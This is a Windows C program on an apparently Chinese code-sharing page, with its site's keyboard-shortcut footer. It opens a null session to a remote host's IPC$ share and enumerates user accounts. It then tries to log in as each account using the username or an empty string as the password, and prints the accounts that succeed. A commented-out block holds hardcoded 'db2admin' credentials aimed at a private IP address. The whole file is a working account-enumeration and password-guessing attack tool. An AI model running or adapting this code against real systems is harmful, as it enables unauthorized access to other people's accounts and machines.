📄 用空用户及密码连接列用户表测试密码有.txt
字号:
/*
IPC的使用例子
用空用户及密码连接,列用户表,测试密码
*/
#include <windows.h>
#include <stdio.h>
#include <lm.h>
#include <assert.h>
#pragma comment(lib,"netapi32.lib")
#pragma comment(lib,"mpr.lib")
EstablishNullSession(LPCWSTR Server, BOOL bEstablish); //test "net use \\test\ipc$ "" /user:""
int userlist(LPCWSTR Server);
int checkuser(); //
WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL 远方连接
LPUSER_INFO_20 pBuf; //用户列表指
DWORD sumuser = 0; //用户数
int wmain(int argc, wchar_t *argv[])
{
if(argc != 2 )
{
printf("Usage: %ls <\\\\Server>\n", argv[0]);
printf("Usage: %ls \\\\192.168.11.4\n", argv[0]);
return 1;
}
if(EstablishNullSession( argv[1], TRUE )) {
userlist(argv[1]);
EstablishNullSession( argv[1], FALSE );
checkuser();
/*
NETRESOURCE res;
res.lpLocalName = NULL;
res.lpProvider = NULL;
res.dwType = RESOURCETYPE_ANY;
res.lpRemoteName ="\\\\192.168.11.36\\ipc$";
NET_API_STATUS nas=WNetAddConnection2(&res,"db22admin","db2admin",CONNECT_UPDATE_PROFILE);
if( nas == NERR_Success ) printf("pass is ok\n");;
*/
// EstablishNullSession( argv[1], FALSE );
} else {
printf("Error establishing Null session! (rc=%lu)\n", GetLastError());
return -1;
}
return 0;
}
BOOL
EstablishNullSession( LPCWSTR Server, BOOL bEstablish)
{
LPCWSTR szIpc = L"\\IPC$";
DWORD cchServer;
NET_API_STATUS nas;
if(Server == NULL || *Server == L'\0') {
SetLastError(ERROR_INVALID_COMPUTERNAME);
return FALSE;
}
cchServer = lstrlenW( Server );
if(Server[0] != L'\\' && Server[1] != L'\\') {
RemoteResource[0] = L'\\';
RemoteResource[1] = L'\\';
RemoteResource[2] = L'\0';
}
else {
cchServer -= 2; // drop slashes from count
RemoteResource[0] = L'\0';
}
if(cchServer > CNLEN) {
SetLastError(ERROR_INVALID_COMPUTERNAME);
return FALSE;
}
if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;
if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;
if(bEstablish) {
USE_INFO_2 ui2;
ZeroMemory(&ui2, sizeof(ui2));
ui2.ui2_local = NULL;
ui2.ui2_remote = (LPTSTR) RemoteResource;
wprintf(L"rs=%s\n",(LPTSTR)RemoteResource);
ui2.ui2_asg_type = USE_IPC;
ui2.ui2_password = ui2.ui2_username = ui2.ui2_domainname = (LPTSTR) L"";
// LPWSTR passws=SysAllocString(L"db2admin");
// LPWSTR userw=SysAllocString(L"db2admin");
// ui2.ui2_username=(LPTSTR)userw;
// ui2.ui2_username=(LPTSTR)passws;
// ui2.ui2_password=(LPTSTR)passws;
nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
}
else {
nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);
}
if( nas == NERR_Success ) return TRUE; // indicate success
SetLastError( nas );
return FALSE;
}
int userlist(LPCWSTR Server)
{
DWORD dwTotalCount = 0;
NET_API_STATUS nStatus;
DWORD dwTotalEntries = 0;
DWORD dwResumeHandle = 0;
// LPWSTR sname=L"\\\\192.168.11.4";
nStatus = NetUserEnum(Server,
20,
FILTER_NORMAL_ACCOUNT,
(LPBYTE*)&pBuf,
0xFFFFFFFF, //pbuf的长度
&sumuser,
&dwTotalEntries,
&dwResumeHandle);
if (nStatus==NERR_Success) {
printf("user list!\n");
for(int n=0;n<sumuser;n++){ wprintf(L"name=%s\n",(pBuf+n)->usri20_name ); }
}
return 1;
}
int checkuser()
{
NET_API_STATUS nass;
USE_INFO_2 ui2;
ZeroMemory(&ui2, sizeof(ui2));
ui2.ui2_local = NULL;
ui2.ui2_remote = (LPTSTR) RemoteResource;
wprintf(L"rs=%s\n",(LPTSTR)RemoteResource);
ui2.ui2_asg_type = USE_IPC;
ui2.ui2_password = ui2.ui2_username = ui2.ui2_domainname = (LPTSTR) L"";
for (int n=0;n<sumuser;n++)
{
LPWSTR passws=SysAllocString((pBuf+n)->usri20_name);
LPWSTR userw=SysAllocString((pBuf+n)->usri20_name);
ui2.ui2_username=(LPTSTR)userw;
ui2.ui2_password=(LPTSTR)passws;
nass = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
if( nass== NERR_Success ) {
NetUseDel(NULL, (LPTSTR) RemoteResource, 0);
wprintf(L"name=%s password%s\n",(pBuf+n)->usri20_name,(pBuf+n)->usri20_name);
}
ui2.ui2_password=(LPTSTR)L"";
nass = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
if( nass== NERR_Success ) {
NetUseDel(NULL, (LPTSTR) RemoteResource, 0);
printf("OK\n");
wprintf(L"name=%s password%s\n",(pBuf+n)->usri20_name,(pBuf+n)->usri20_name);
}
}
return 1;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -